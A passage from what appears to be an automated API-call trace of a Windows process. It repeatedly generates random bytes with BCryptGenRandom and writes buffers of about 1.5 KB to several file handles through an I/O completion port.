lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0192.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.400] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.400] free (_Block=0x3e305b8) [0193.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.400] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.401] free (_Block=0x1fa91d0) [0193.401] free (_Block=0x1fa2ed8) [0193.401] free (_Block=0x1fa90b8) [0193.401] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.551] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.551] free (_Block=0x3e305b8) [0193.551] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.552] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.552] free (_Block=0x1fa91d0) [0193.552] free (_Block=0x1fa2ed8) [0193.552] free (_Block=0x1fa90b8) [0193.552] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.695] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.695] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.695] free (_Block=0x3e305b8) [0193.695] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.695] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.697] free (_Block=0x1fa91d0) [0193.697] free (_Block=0x1fa2ed8) [0193.697] free (_Block=0x1fa90b8) [0193.697] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0193.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.720] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.720] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.720] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.720] free (_Block=0x3e305b8) [0193.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.720] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.721] free (_Block=0x1fa91d0) [0193.721] free (_Block=0x1fa2ed8) [0193.721] free (_Block=0x1fa90b8) [0193.721] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.735] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.735] free (_Block=0x3e305b8) [0193.735] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.735] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.736] free (_Block=0x1fa91d0) [0193.736] free (_Block=0x1fa2ed8) [0193.736] free (_Block=0x1fa90b8) [0193.736] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.752] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.753] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.754] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.754] free (_Block=0x3e305b8) [0193.754] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.754] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.754] free (_Block=0x1fa91d0) [0193.754] free (_Block=0x1fa2ed8) [0193.754] free (_Block=0x1fa90b8) [0193.754] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.765] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.765] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.765] free (_Block=0x3e305b8) [0193.765] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.765] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.765] free (_Block=0x1fa91d0) [0193.765] free (_Block=0x1fa2ed8) [0193.765] free (_Block=0x1fa90b8) [0193.765] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.781] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.783] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.783] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.783] free (_Block=0x3e305b8) [0193.783] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.783] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.783] free (_Block=0x1fa91d0) [0193.783] free (_Block=0x1fa2ed8) [0193.783] free (_Block=0x1fa90b8) [0193.783] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.796] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.796] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.796] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.796] free (_Block=0x3e305b8) [0193.796] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.796] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.796] free (_Block=0x1fa91d0) [0193.796] free (_Block=0x1fa2ed8) [0193.796] free (_Block=0x1fa90b8) [0193.797] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.808] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.808] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.809] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.809] free (_Block=0x3e305b8) [0193.809] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.809] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.810] free (_Block=0x1fa91d0) [0193.810] free (_Block=0x1fa2ed8) [0193.810] free (_Block=0x1fa90b8) [0193.810] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.821] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.821] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.821] free (_Block=0x3e305b8) [0193.822] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.822] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.822] free (_Block=0x1fa91d0) [0193.822] free (_Block=0x1fa2ed8) [0193.822] free (_Block=0x1fa90b8) [0193.822] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.836] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.836] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.836] free (_Block=0x3e305b8) [0193.836] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.836] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.836] free (_Block=0x1fa91d0) [0193.837] free (_Block=0x1fa2ed8) [0193.837] free (_Block=0x1fa90b8) [0193.837] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0193.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.846] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.846] free (_Block=0x3e305b8) [0193.846] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.846] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.847] free (_Block=0x1fa91d0) [0193.847] free (_Block=0x1fa2ed8) [0193.847] free (_Block=0x1fa90b8) [0193.847] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0193.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0193.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0193.994] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.994] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.994] free (_Block=0x3e305b8) [0193.994] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.994] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.994] free (_Block=0x1fa91d0) [0193.994] free (_Block=0x1fa2ed8) [0193.995] free (_Block=0x1fa90b8) [0193.995] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0194.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.047] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.048] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.048] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.048] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.048] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.048] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.048] free (_Block=0x3e305b8) [0194.048] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.049] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0194.049] free (_Block=0x1fa91d0) [0194.049] free (_Block=0x77d7a8) [0194.049] free (_Block=0x1fa90b8) [0194.049] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0194.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.083] CloseHandle (hObject=0x308) returned 1 [0194.083] free (_Block=0x3f70048) [0194.084] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0194.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0194.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0194.093] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.093] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.093] free (_Block=0x3e305b8) [0194.093] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.093] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.093] free (_Block=0x1fa91d0) [0194.093] free (_Block=0x1fa2ed8) [0194.093] free (_Block=0x1fa90b8) [0194.093] WriteFile (in: 